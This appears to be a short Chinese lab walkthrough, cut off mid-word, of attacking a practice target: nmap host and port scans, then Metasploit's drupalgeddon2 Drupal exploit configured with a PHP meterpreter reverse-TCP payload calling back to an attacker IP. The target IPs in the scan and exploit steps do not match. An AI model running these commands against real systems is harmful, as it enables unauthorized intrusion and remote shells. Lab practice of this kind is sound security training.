查看本机的ip地址
使用nmap进行ip地址扫描,确定靶机的IP
nmap -sP 192.168.159.1/24
对其进行详细扫描
nmap -A 192.168.159.140 -p 1-65535
80端口开放,直接使用浏览器访问
使用MSF搜索该网页模板存在的漏洞
msfconsole
search drupal
使用第四个攻击模块
use exploit/unix/webapp/drupal_drupalgeddon2
选择攻击载荷
set payload php/meterpreter/reverse_tcp
添加
set RHOSTS 192.168.1.158
set LHOST 192.168.1.150
攻